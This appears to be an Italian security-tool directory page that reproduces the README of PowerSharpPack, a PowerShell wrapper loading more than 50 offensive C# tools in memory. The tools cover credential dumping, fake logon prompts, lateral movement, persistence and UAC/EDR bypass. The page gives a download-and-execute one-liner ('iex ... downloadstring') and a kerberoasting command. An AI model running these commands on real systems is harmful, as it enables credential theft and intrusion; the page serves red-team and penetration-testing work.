Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PowerSharpPack — Wrapper PowerShell che raggruppa oltre 50 strumenti di sicurezza offensivi in C# per post-sfruttamento, elevazione dei privilegi, dumping delle credenziali, movimento laterale e ricognizione di Active Directory in operazioni di red team. | Kitploit
Strumenti/GitHubGitHub/s3cur3th1ssh1t/powersharppack
Escalation di PrivilegiFramework di ExploitGenerazione di PayloadMovimento LateraleRaccolta InformazioniPost-ExploitPenetration TestingRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
s3cur3th1ssh1t/powersharppack

PowerSharpPack

Wrapper PowerShell che raggruppa oltre 50 strumenti di sicurezza offensivi in C# per post-sfruttamento, elevazione dei privilegi, dumping delle credenziali, movimento laterale e ricognizione di Active Directory in operazioni di red team.

Vedi Repository
1.7k312151 anno faRevisionato da Kitploit

Sponsorizzato da

     

PowerSharpPack

Molti progetti C# offensivi utili sono stati racchiusi in PowerShell per un facile utilizzo.

Perché? A mio parere personale, PowerShell offensivo non è morto a causa di AMSI, Script-block-logging, Constrained Language Mode o altre funzionalità di protezione. Ognuno di questi meccanismi può essere bypassato. Poiché la maggior parte dei nuovi progetti innovativi di sicurezza offensiva sono scritti in C#, ho deciso di renderli utilizzabili anche in PowerShell.

Quindi cosa ho fatto sostanzialmente?

  1. Prima di tutto, clonare ogni repository C#.
  2. Impostare la classe e i metodi main come pubblici.
  3. Per alcuni progetti ho unito pull request con nuove funzionalità o correzioni di bug, oppure ho dovuto rimuovere istruzioni environment.exit in modo che l'intero processo PowerShell non venga terminato per parametri mancanti e così via.
  4. Successivamente compilare ogni binario.
  5. Comprimere con Gzip e codificare in base64 il binario compilato, e caricarlo in PowerShell tramite [System.Reflection.Assembly]::Load($DecompressedDecodedBinary).

È un processo molto semplice ma che richiede tempo per molti repository.

Quali strumenti sono inclusi?

Internalmonologue

Attacco Internal Monologue: Recupero di hash NTLM senza toccare LSASS

@Crediti a: https://github.com/eladshamir/Internal-Monologue

Seatbelt

Seatbelt è un progetto C# che esegue una serie di "controlli di sicurezza" orientati all'host, rilevanti sia dal punto di vista offensivo che difensivo.

@Crediti a: https://github.com/GhostPack/Seatbelt

SharpWeb

Progetto CLR .NET 2.0 per recuperare le credenziali salvate del browser da Google Chrome, Mozilla Firefox e Microsoft Internet Explorer/Edge.

@Crediti a: https://github.com/djhohnstein/SharpWeb

UrbanBishop

Crea una sezione RW locale in UrbanBishop e poi mappa quella sezione come RX in un processo remoto. Caricamento di shellcode reso facile.

@Crediti a: https://github.com/FuzzySecurity/Sharp-Suite

SharpUp

SharpUp è un porting C# di varie funzionalità di PowerUp.

@Crediti a: https://github.com/GhostPack/SharpUp

Rubeus

Rubeus è un set di strumenti C# per l'interazione grezza con Kerberos e i suoi abusi.

@Crediti a: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/

SharPersist

Toolkit di persistenza per Windows scritto in C#.

@Crediti a: https://github.com/fireeye/SharPersist

Sharpview

Implementazione C# di harmj0y's PowerView

@Crediti a: https://github.com/tevora-threat/SharpView

winPEAS

Controlla la checklist di escalation dei privilegi locali di Windows da book.hacktricks.xyz

@Crediti a: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Lockless

Lockless permette la copia di file bloccati.

@Crediti a: https://github.com/GhostPack/Lockless

SharpChromium

Progetto CLR .NET 4.0 per recuperare dati di Chromium, come cookie, cronologia e login salvati.

@Crediti a: https://github.com/djhohnstein/SharpChromium

SharpDPAPI

SharpDPAPI è un porting C# di alcune funzionalità DPAPI di Mimikatz.

@Crediti a: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/

SharpShares

Enumera tutte le condivisioni di rete nel dominio corrente. Può anche risolvere i nomi in indirizzi IP.

@Crediti a: https://github.com/djhohnstein/SharpShares

SharpSniper

Trova utenti specifici in Active Directory tramite il loro nome utente e indirizzo IP di accesso

@Crediti a: https://github.com/HunnicCyber/SharpSniper

SharpSpray

SharpSpray è un semplice set di codice per eseguire un attacco di password spraying contro tutti gli utenti di un dominio utilizzando LDAP ed è compatibile con Cobalt Strike.

@Crediti a: https://github.com/jnqpblc/SharpSpray

Watson

Enumera i KB mancanti e suggerisce exploit per vulnerabilità di escalation dei privilegi utili

@Crediti a: https://github.com/rasta-mouse/Watson

Grouper2

Trova vulnerabilità nei Criteri di gruppo di Active Directory

@Crediti a: https://github.com/l0ss/Grouper2

Tokenvator

Uno strumento per elevare i privilegi con i token di Windows

@Crediti a: https://github.com/0xbadjuju/Tokenvator

SauronEye

Strumento di ricerca per trovare file specifici contenenti parole specifiche, ad esempio file contenenti password.

@Crediti a: https://github.com/vivami/SauronEye

Basta caricare lo script principale con

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')

e scegliere lo strumento come parametro switch, ad esempio:

PowerSharpPack -seatbelt -Command "AMSIProviders"

alt text

Se si desidera passare più parametri al binario, è sufficiente usare le virgolette come:

PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"

Se non si desidera caricare tutti i binari per vari motivi, è possibile utilizzare gli script PowerShell per singolo binario situati nella cartella PowerSharpBinaries.

Progetti disponibili anche come script PowerShell autonomo:

SharpCloud

Semplice C# per verificare l'esistenza di file di credenziali relativi ad AWS, Microsoft Azure e Google Compute.

@Crediti a: https://github.com/chrismaddalena/SharpCloud

SharpSSDP

SSDP Service Discovery

@Crediti a: https://github.com/rvrsh3ll/SharpSSDP

DAFT

DAFT: Database Audit Framework & Toolkit

@Crediti a: https://github.com/NetSPI/DAFT

Get-RBCD-Threaded

Strumento per scoprire percorsi di attacco di Constrained Delegation basati su risorse in ambienti Active Directory

@Crediti a: https://github.com/FatRodzianko/Get-RBCD-Threaded

SharpGPO-RemoteAccessPolicies

Uno strumento C# per enumerare le politiche di accesso remoto tramite i criteri di gruppo.

@Crediti a: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies

SharpAllowedToAct

Acquisizione di oggetti computer tramite Constrained Delegation basata su risorse (msDS-AllowedToActOnBehalfOfOtherIdentity)

@Crediti a: https://github.com/pkb1s/SharpAllowedToAct

WireTap

Progetto .NET 4.0 per interagire con hardware video, audio e tastiera.

@Crediti a: https://github.com/djhohnstein/WireTap

SharpClipboard

Monitoraggio degli Appunti in C#

@Crediti a: https://github.com/slyd0g/SharpClipboard

SharpPrinter

Scopri stampanti + verifica vulnerabilità

@Crediti a: https://github.com/rvrsh3ll/SharpPrinter

SharpHide

Strumento per creare chiavi di registro nascoste.

@Crediti a: https://github.com/outflanknl/SharpHide

SpoolSample

Strumento PoC per costringere host Windows ad autenticarsi su altre macchine tramite l'interfaccia RPC MS-RPRN. Ciò è possibile anche tramite altri protocolli.

@Crediti a: https://github.com/leechristensen/SpoolSample

SharpGPOAbuse

SharpGPOAbuse è un'applicazione .NET scritta in C# che può essere utilizzata per sfruttare i diritti di modifica di un utente su un Oggetto Criterio di Gruppo (GPO) al fine di compromettere gli oggetti controllati da quel GPO.

@Crediti a: https://github.com/FSecureLABS/SharpGPOAbuse

SharpDump

SharpDump è un porting C# della funzionalità Out-Minidump.ps1 di PowerSploit.

@Crediti a: https://github.com/GhostPack/SharpDump

SharpHound3

Raccolta dati C# per il progetto BloodHound, Versione 3

@Crediti a: https://github.com/BloodHoundAD/SharpHound3

PostDump

Un altro strumento per eseguire il minidump del processo LSASS utilizzando poche tecniche per evitare il rilevamento.

@Crediti a: https://github.com/YOLOP0wn/POSTDump

SharpLocker

SharpLocker aiuta a ottenere le credenziali dell'utente corrente mostrando una falsa schermata di blocco di Windows, tutto l'output viene inviato alla Console, perfetto per Cobalt Strike.

@Crediti a: https://github.com/Pickfordmatt/SharpLocker

Eyewitness

EyeWitness è progettato per fare screenshot di siti web, fornire alcune informazioni header del server e identificare credenziali predefinite se possibile.

@Crediti a: https://github.com/FortyNorthSecurity/EyeWitness

FakeLogonScreen

Falsa schermata di accesso di Windows per rubare password

@Crediti a: https://github.com/bitsadmin/fakelogonscreen

P0wnedShell

Toolkit di post-exploitation per PowerShell Runspace

@Crediti a: https://github.com/Cn33liz/p0wnedShell

Safetykatz

SafetyKatz è una combinazione di una versione leggermente modificata del progetto Mimikatz di @gentilkiwi e del .NET PE Loader di @subTee L'ho modificato di nuovo con la mia versione offuscata di Mimikatz.

@Crediti a: https://github.com/GhostPack/SafetyKatz

InveighZero

Strumento Windows C# LLMNR/mDNS/NBNS/DNS/DHCPv6 spoofing/man-in-the-middle .

@Crediti a: https://github.com/Kevin-Robertson/InveighZero

SharpSploit

SharpSploit è una libreria .NET di post-exploitation scritta in C#.

@Crediti a: https://github.com/cobbr/SharpSploit

Snaffler

Uno strumento per penetration tester per aiutare a trovare "dolci" interessanti, di @l0ss e @Sh3r4 ( Twitter: @/mikeloss e @/sh3r4_hax ).

@Crediti a: https://github.com/SnaffCon/Snaffler

BadPotato

itm4ns Printspoofer in C#.

@Crediti a: https://github.com/BeichenDream/BadPotato

BetterSafetyKatz

Fork di SafetyKatz che recupera dinamicamente l'ultima versione precompilata di Mimikatz direttamente dal repository GitHub di gentilkiwi, applica patch runtime alle firme e utilizza SharpSploit DInvoke per caricare in memoria tramite PE-Load.

@Crediti a: https://github.com/Flangvik/BetterSafetyKatz

SharpKatz

Porting C# dei comandi sekurlsa::logonpasswords, sekurlsa::ekeys e lsadump::dcsync di mimikatz.

@Crediti a: https://github.com/b4rtik/SharpKatz

Gopher

Strumento C# per scoprire frutti a bassa pendenza.

@Crediti a: https://github.com/EncodeGroup/Gopher

SharpOxidResolver

IOXIDResolver da AirBus Security/PingCastle.

@Crediti a: https://github.com/vletoux/pingcastle/

SharpBlock

Un metodo per bypassare le DLL di proiezione attiva degli EDR impedendo l'esecuzione del punto di ingresso.

@Crediti a: https://github.com/CCob/SharpBlock

SharpLoginPrompt

Questo programma crea un prompt di accesso per raccogliere nome utente e password dell'utente corrente. Questo progetto consente ai red team di phishare nome utente e password dell'utente corrente senza toccare lsass e senza avere credenziali di amministratore sul sistema.

@Crediti a: https://github.com/shantanu561993/SharpLoginPrompt

ThunderFox

Recupera dati (contatti, email, cronologia, cookie e credenziali) da Thunderbird e Firefox.

@Crediti a: https://github.com/V1V1/SharpScribbles

StickyNotesExtract

Estrae dati dal database delle Note Appiccicose di Windows. Funziona su Windows 10 Build 1607 e successive. Questo progetto non dipende da dipendenze esterne.

@Crediti a: https://github.com/V1V1/SharpScribbles

SCShell

Strumento di movimento laterale senza file che si basa su ChangeServiceConfigA per eseguire comandi.

@Crediti a: https://github.com/Mr-Un1k0d3r/SCShell

SharpSecDump

Porting .Net della funzionalità di dump remoto di SAM + LSA Secrets di impacket's secretsdump.py.

@Crediti a: https://github.com/G0ldenGunSec/SharpSecDump

SharpHandler

Questo progetto riutilizza handle aperti a lsass per analizzare o eseguire minidump di lsass, quindi non è necessario utilizzare il proprio handle di lsass per interagire con esso.

@Crediti a: https://github.com/jfmaes/SharpHandler

SharpRDP

Applicazione Console .NET per il protocollo Remote Desktop per l'esecuzione di comandi autenticati.

@Crediti a: https://github.com/0xthirteen/SharpRDP

SharpMove

Progetto .NET per l'esecuzione remota autenticata.

@Crediti a: https://github.com/0xthirteen/SharpMove

SharpStay

Progetto .NET per installare la persistenza

@Crediti a: https://github.com/0xthirteen/SharpStay

SharpPrintNightmare

Implementazione C# di PrintNightmare CVE-2021-1675/CVE-2021-34527

@Crediti a: https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare

Certify

Abuso di certificati Active Directory.

@Crediti a: https://github.com/GhostPack/Certify

Farmer

Farmer è un progetto per raccogliere hash NetNTLM in un dominio Windows. Farmer ottiene questo risultato creando un server WebDAV locale che causa l'autenticazione del Mini Redirector WebDAV da qualsiasi client che si connette.

@Crediti a: https://github.com/mdsecactivebreach/Farmer

SharpBypassUAC

Strumento C# per bypass UAC

@Crediti a: https://github.com/FatRodzianko/SharpBypassUAC

StandIn

StandIn è un piccolo toolkit di post-exploitation per AD .NET35/45

@Crediti a: https://github.com/FuzzySecurity/StandIn

Carbuncle

Strumento per interagire con l'interop di Outlook durante impegni di red team

@Crediti a: https://github.com/checkymander/Carbuncle

Whisker

Whisker è uno strumento C# per prendere il controllo di account utente e computer di Active Directory manipolando il loro attributo msDS-KeyCredentialLink, aggiungendo di fatto "Shadow Credentials" all'account target.

@Crediti a: https://github.com/eladshamir/Whisker

SharpLdapRelayScan

Porting C# di LdapRelayScan

@Crediti a: https://github.com/klezVirus/SharpLdapRelayScan

LdapSignCheck

Progetto C# per verificare la firma LDAP.

@Crediti a: https://github.com/cube0x0/LdapSignCheck

SharpImpersonation

SharpImpersonation - Uno strumento di impersonificazione utente - tramite Token o iniezione di Shellcode.

@Crediti a: https://github.com/S3cur3Th1sSh1t/SharpImpersonation

SharpWSUS

SharpWSUS è uno strumento CSharp per il movimento laterale tramite WSUS. C'è un blog corrispondente (https://labs.nettitude.com/blog/introducing-sharpwsus/) che ha informazioni più dettagliate sullo strumento, l'uso e il rilevamento.

@Crediti a: https://github.com/nettitude/SharpWSUS

MalSCCM

Questo strumento permette di abusare di server SCCM locali o remoti per distribuire applicazioni dannose agli host che gestiscono. Per utilizzare questo strumento, il tuo processo corrente deve avere diritti di amministrazione sul server SCCM. Tipicamente le distribuzioni di SCCM avranno il server di gestione e il server primario sullo stesso host, nel qual caso l'host restituito dal comando locate può essere utilizzato come server primario.

@Crediti a: https://github.com/nettitude/MalSCCM

KrbRelay

Framework per il relaying Kerberos

@Crediti a: https://github.com/cube0x0/KrbRelay

SharpSCCM

Un'utilità C# per interagire con SCCM

@Credito: https://github.com/Mayyhem/SharpSCCM

ShadowSpray

Uno strumento per spruzzare Shadow Credentials su un intero dominio nella speranza di abusare di DACL GenericWrite/GenericAll dimenticate su altri oggetti nel dominio.

@Credito: https://github.com/Dec0ne/ShadowSpray

Grouper3

Trova vulnerabilità nei Criteri di gruppo di Active Directory, ma fallo meglio di Grouper2.

@Crediti a: https://github.com/Group3r/Group3r

Gli ultimi due non sono fondamentalmente Assembly. Ma ho costruito un Assembly per eseguirli dalla memoria, caricabile tramite la tecnica di questo repository. Un'altra tecnica in background per l'esecuzione, ma comunque utile:

HandleKatz

Dumper PIC di lsass utilizzando handle clonati

@Crediti a: https://github.com/codewhitesec/HandleKatz

NanoDump

Scarica LSASS come si deve

@Crediti a: https://github.com/helpsystems/nanodump

PPLDump

Scarica la memoria di un PPL con un exploit in userland

@Crediti a: https://github.com/itm4n/PPLdump

Scarica lo strumento